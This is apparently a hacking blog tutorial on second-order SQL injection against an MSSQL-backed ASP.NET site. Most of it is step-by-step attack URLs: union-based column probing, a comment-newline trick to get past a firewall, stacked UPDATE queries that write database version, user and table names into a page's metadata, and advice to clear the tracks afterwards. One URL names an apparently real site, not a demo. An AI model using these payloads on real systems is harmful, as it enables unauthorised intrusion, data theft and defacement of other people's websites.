In the Name of ALLAH the Most Beneficent and the Merciful

As i promised before here we are back with a new tutorial on Second Order Exploitation in MSSQL Based website. Here is a basic tutorial i posted on Second order explitation MSSQL Second Order Exploitation here i discussed the same trick which we are going to use in this tutorial for Second Order exploitation.

Here is the complete video for this tutorial, i hope you enjoy it. Now in this tutorial we ll use a demo site throughout this tutorial.


http://www.demosite.com/press-media-detaile.aspx?id=95'

Now lets find out the number of columns
http://www.aptech-education.com/press-media-detaile.aspx?id=95 order by 6--
Error
http://www.demosite.com/press-media-detaile.aspx?id=95 order by 5--
Error but a different one, that means its working Lets try Union query.
http://www.demosite.com/press-media-detaile.aspx?id=95 Union select 1,2,3,4,5--
And thats what i got in response....

They said they were using a firewall, my reaction was like,


I made my next move bypassing the firewall,
http://www.demosite.com/press-media-detaile.aspx?id=95 Union --%0aselect 1,2,3,4,5--
I got another error

It say that this is not the right number of columns, here we can also see a query as well. So lets try 8 columns according to the query.
http://www.demosite.com/press-media-detaile.aspx?id=95 Union --%0aselect 1,2,3,4,5,6,7,8--
Here we got another Error :P

Now lets try using Null and union all select.
http://www.demosite.com/press-media-detaile.aspx?id=95 Union all--%0aselect null,null,null,null,null,null,null,null--
We got error in another different line which means there are different queries having different numbers of columns, so technichally its not possible here to inject using Union select without having some special scenario. Now i tried Error based.
http://www.demosite.com/press-media-detaile.aspx?id=95 and 1=@@version--
I was fucking surprized, no output in error over here.



So now its right time to activate my sharingan, lets do it.



As i activated my sharingan, i was able to see though the code and understand the whole scenario here, we can see a query having all the columns and table name which was visible in the error. MSSQL allows stacked queries, why not let just try Second Order Injection.


Now we are set lets try Second Order Exploitation, Its always a good idea to choose a hidden place for our output, so i decided MetaData. I will use the Update query, i already have the column names and the table names.
http://www.demosite.com/press-media-detaile.aspx?id=95;update tablename set metadata_content=@@version where id=95--
Now to see the output go and check the output for which you injected, we injected in id 95.
http://www.demosite.com/press-media-detaile.aspx?id=95
Here checked the source code of page, and here we got the output.

Now here our final query which will inject the whole output in the column.
http://www.demosite.com/press-media-detaile.aspx?id=95;update tablename set meta_description='"><'%2b'font color=red'%2b'>Injected by Zen<'%2b'br'%2b'>Database :: '%2bdb_name()%2b'<'%2b'br'%2b'>User :: '%2buser%2b'<'%2b'br'%2b'><'%2b'font color=green'%2b'>'%2breplace(replace((select+table_name%2b'<'%2b'br'%2b'>' from information_schema.tables FOR+XML+PATH('')),'%26lt;','<'),'%26gt;','>')%2b'<'%2b'!--' where id=95;--
And here is our Output, once you are done, please remember to clear the tracks by setting that column back to its default value.


I hope you enjoyed reading the tutorial.

Author : Zen Javanicus
Date : 2015-05-11